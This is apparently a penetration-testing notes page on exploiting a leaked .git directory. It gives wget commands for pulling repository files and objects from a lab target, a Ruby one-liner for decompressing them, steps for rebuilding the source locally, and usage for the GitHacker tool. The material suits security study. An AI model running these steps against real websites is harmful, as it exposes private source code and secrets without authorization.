Git
Git Information Leak
If the web server leaks the .git
directory, we can download this directory recursively:
wget -r http://www.example.com/.git/
Show changes between commits, commit and working tree, etc:
git diff
With modern URL mapping (i.e. not relying on the filesystem), it's less and less common to see these types of issues, but it's always important to be on the lookout for them.
Bypass Restrictions
If directory listing is disabled, we should examine the following two files first:
.git/config
.git/HEAD
Access https://www.example.com/.git/config
:
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
Access https://www.example.com/.git/HEAD
:
ref: refs/heads/master
Access https://www.example.com/.git/refs/heads/master
:
5346cb2290d9918bfaad7318ebcb2498fe5ebe18
Here 53
is a directory name and 46cb2290d9918bfaad7318ebcb2498fe5ebe18
is a hash. This hash represents a commit and it can found at .git/objects/53/
. Download this commit:
wget https://ptl-8ddb9a66-9a79abff.libcurl.so/.git/objects/53/46cb2290d9918bfaad7318ebcb2498fe5ebe18
The file was compressed with zlib, but there isn't a built-in tool for zlib decompression. We can decompress it with Ruby:
$ ruby -rzlib -e 'print Zlib::Inflate.new.inflate(STDIN.read)' < 46cb2290d9918bfaad7318ebcb2498fe5ebe18
commit 199tree 58ace0476093d04023f84d7816adacfa7b879c43
author Louis Nyffenegger <louis@pentesterlab.com> 1652405113 +0000
committer Louis Nyffenegger <louis@pentesterlab.com> 1652405113 +0000
Initial import
From there, we get a new commit that we can download, and from there, check the content by deflating it and running strings -a
on the result:
$ wget https://ptl-8ddb9a66-9a79abff.libcurl.so/.git/objects/58/ace0476093d04023f84d7816adacfa7b879c43
$ ruby -rzlib -e 'print Zlib::Inflate.new.inflate(STDIN.read)' < ace0476093d04023f84d7816adacfa7b879c43 | strings -a
tree 182
40000 css
100644 favicon.ico
s100644 footer.php
3100644 header.php
100644 index.php
We want the hash for each file. Create our own git repo:
mkdir hack ; cd hack ; git init
Copy files to it:
$ mkdir -p .git/objects/53 .git/objects/58
$ cp ../46cb2290d9918bfaad7318ebcb2498fe5ebe18 .git/objects/53/
$ cp ../ace0476093d04023f84d7816adacfa7b879c43 .git/objects/58/
Retrieve hashes:
$ git cat-file -p 58ace0476093d04023f84d7816adacfa7b879c43
040000 tree b352dde43705f193d2c1d4e6f6a133321186869f css
100644 blob f303c6a7797f5e7a0d5bd31d39a7149366bbf873 favicon.ico
100644 blob 5adab1a1c52dc009d4f26bbce30dacc4c93eea33 footer.php
100644 blob c3646db7f9c7e6f126c75900fdcce16d50e1da82 header.php
100644 blob 88beb94b5e1fc48e1625c89f892b04bffb58225c index.php
Just to save time, assume that we know the key is inside header.php
. Create a directory and download this file:
mkdir .git/objects/c3 && wget https://ptl-8ddb9a66-9a79abff.libcurl.so/.git/objects/c3/646db7f9c7e6f126c75900fdcce16d50e1da82 -O .git/objects/c3/646db7f9c7e6f126c75900fdcce16d50e1da82
Examine source code:
git cat-file -p c3646db7f9c7e6f126c75900fdcce16d50e1da82
GitHacker
GitHacker is a multiple threads tool to detect whether a site has the .git
folder leakage vulnerability. It is able to download the target .git
folder almost completely. This tool also works when the DirectoryListings
feature is disabled.
Installation: pip3 install GitHacker
Usage: githacker --url http://127.0.0.1/.git/ --folder result
Last updated
Was this helpful?